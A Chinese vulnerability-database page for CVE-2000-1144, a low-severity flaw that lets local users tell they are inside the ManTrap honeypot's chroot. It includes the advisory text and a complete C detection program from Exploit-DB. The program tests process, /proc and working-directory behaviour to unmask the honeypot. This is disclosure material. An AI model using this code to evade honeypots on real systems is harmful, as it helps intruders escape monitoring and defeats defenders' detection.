CVE-2000-1144
CVSS2.1
发布时间 :2001-01-09 00:00:00
修订时间 :2016-10-17 22:08:56
NMCOE    

[原文]Recourse ManTrap 1.6 sets up a chroot environment to hide the fact that it is running, but the inode number for the resulting "/" file system is higher than normal, which allows attackers to determine that they are in a chroot environment.


[CNNVD]Recourse ManTrap掩盖运行漏洞(CNNVD-200101-052)

        Recourse ManTrap 1.6版本建立一个chroot环境掩盖它正在运行的事实,但由此产生的“/”文件系统中的inode数目较正常高,攻击者利用该漏洞确定它们在chroot环境中。
        
        

- CVSS (基础分值)

CVSS分值: 2.1 [轻微(LOW)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1144
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-1144
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200101-052
(官方数据源) CNNVD

- 其它链接及资源

http://archives.neohapsis.com/archives/bugtraq/2000-11/0041.html
(UNKNOWN)  BUGTRAQ  20001102 Mantrap By Recourse Technologies - Fate Advisory (11-01-00)
http://archives.neohapsis.com/archives/bugtraq/2000-11/0100.html
(VENDOR_ADVISORY)  BUGTRAQ  20001107 Vendor Response Re: Mantrap Advisory Vendor Followup - Fate Research Labs
http://marc.info/?l=bugtraq&m=97349791405580&w=2
(UNKNOWN)  BUGTRAQ  20001105 Mantrap Advisory Vendor Followup - Fate Research Labs
http://www.securityfocus.com/bid/1909
(VENDOR_ADVISORY)  BID  1909
http://xforce.iss.net/static/5472.php
(UNKNOWN)  XF  mantrap-inode-disclosure

- 漏洞信息

Recourse ManTrap掩盖运行漏洞
低危 未知
2001-01-09 00:00:00 2005-10-12 00:00:00
本地  
        Recourse ManTrap 1.6版本建立一个chroot环境掩盖它正在运行的事实,但由此产生的“/”文件系统中的inode数目较正常高,攻击者利用该漏洞确定它们在chroot环境中。
        
        

- 公告与补丁

        

- 漏洞信息 (20381)

ManTrap 1.6.1 Root Directory Inode Disclosure Vulnerability (EDBID:20381)
unix local
2000-11-01 Verified
0 f8labs
N/A [点击下载]
source: http://www.securityfocus.com/bid/1909/info

ManTrap is a "honeypot" intrusion detection system designed to lure attackers into it for analysis. The honeypot is implemented as a chroot'ed Solaris environment, designed to look and feel real to an attacker who gains access to it. 

Chroot (change root) is a unix mechanism that allows an administrator to force a process/process group to run under a subset of the file system, denying access to any other parts of the file system. It is possible for an attacker to guess that they are on a chrooted() ManTrap system by looking at the inode of the root directory (ls -id /). If it is high (usually within the 100000-200000 range), then the root directory is a chrooted() subset of a larger filesystem. 

This vulnerability, combined with hidden process disclosure (bugtraq ID 1908) should fairly accurately verify to an attaacker (without root privs) that the host is a ManTrap honeypot, defeating its purpose.


/*
 *  ManTrap detection/testing program by wilson / f8labs - www.f8labs.org
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <sys/signal.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <errno.h>
#include <dirent.h>

void check_proc_vs_kill(int listpids)
{ 
  struct stat st;
  int i, counter;
  char buf[520];
  
  printf("proc-vs-kill() test: \n");
  fflush(0);
  
  if (geteuid() == 0)
  {
    printf("  Error: Running as root. NOT performing /proc-vs-kill() test.\n");
    return;
  }

  if (listpids == 1)
  {
    printf("Listing mismatching PIDs:\n");
  }

  counter = 0;
  for (i = 1; i < 65535; i ++)
  {
    if ((kill(i, SIGCONT) != 0) && (errno == EPERM)) /* send SIGCONT (which hopefully won't matter) to the process */
    {
      snprintf(buf, 511, "/proc/%d", i);
      if (stat(buf, &st) != 0)
      {
        counter ++;
        if (listpids == 1)
        {
          printf("%.5d ", i);
          if (counter%8 == 0)
          {
            printf("\n");
          } 
        }
      }
    }
  }
  if (listpids == 1)
  {
    printf("\n");
  }
  if (counter == 0)
  {
    printf("  Normal: No mismatches found.\n");
  } else
  {
    printf("  ManTrap? %d mismatching PIDs found.\n", counter);
  }
}

void check_proc_dotdot()
{
  DIR *procDIR;
  struct dirent *procdirent;
  int found;
  
  printf("dotdot test:\n");
  procDIR = opendir("/proc");
  if (procDIR == NULL)
  {
    printf("  Error: Couldn't open /proc while performing dotdot test.\n");
    return;
  }
  found = 0;
  procdirent = readdir(procDIR);
  while (procdirent != NULL)
  {
    if (strcmp(procdirent->d_name, "..") == 0)
    {
      found = 1;
      break;
    }
    procdirent = readdir(procDIR);
  }
  closedir(procDIR);
  if (found == 0)
  {
    printf("  ManTrap? /proc/.. not found in directory listing!\n");
  } else {
    printf("  Normal: /proc/.. found in directory listing.\n");
  }

}

void check_proc_cwdwalk()
{
  char savedpwd[2048], newpwd[2048];
  
  printf("cwdwalk test:\n");
  if (getwd(savedpwd) == NULL)
  {
    printf("  Error: Couldn't get working directory while performing cwdwalk test.\n");
    return;
  }
  
  if (chdir("/proc/self") != 0)
  {
    printf("  Error: Couldn't chdir to /proc/self while performing cwdwalk test.\n");
    return;
  }
  if (chdir("cwd") != 0)
  {
    printf(" Error: Couldn't chdir to /proc/self/cwd while performing cwdwalk test.\n");
    return;
  }
  if (getwd(newpwd) == NULL)
  {
    printf("  ManTrap? getwd() failed after chdir to /proc/self/cwd.\n");
  } else {
    printf("  Normal: getwd() succeeded after chdir to /proc/self/cwd.\n");
  }
  chdir(savedpwd);
  return;
}

void usage(char *myname)
{
  printf("Usage: %s <-a|-p|-l|-d|-c|-h>\n", myname);
  printf(" -a performs ALL tests\n");
  printf(" -p performs /proc-vs-kill() test\n");
  printf(" -l performs /proc-vs-kill() test and lists mismatching PIDs\n");
  printf(" -d performs /proc/.. test\n");
  printf(" -c performs /proc/self/cwd test\n");
  printf(" -h shows this help\n");
}

int main(int argc, char *argv[])
{
  printf("ManTrap detection/testing program by wilson@f8labs.org - www.f8labs.org\n");
  if (argc != 2)
  {
    usage(argv[0]);
    exit(1);
  }
  if (strlen(argv[1]) != 2)
  {
    usage(argv[0]);
    exit(1);
  }
  switch(argv[1][1])
  {
    case 'a':
      check_proc_vs_kill(0);
      check_proc_dotdot();
      check_proc_cwdwalk();
      break;
    case 'p':
      check_proc_vs_kill(0);
      break;
    case 'l':
      check_proc_vs_kill(1);
      break;
    case 'd':
      check_proc_dotdot();
      break;
    case 'c':
      check_proc_cwdwalk();
      break;
    case 'h':
    default:
      usage(argv[0]);
      exit(1);
      break;    
  }
  printf("Finished.\n");
}
		

- 漏洞信息

1637
Recourse ManTrap Root Directory Inode Disclosure
Local Access Required Information Disclosure
Loss of Confidentiality
Exploit Public

- 漏洞描述

- 时间线

2000-11-01 Unknow
2000-11-01 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站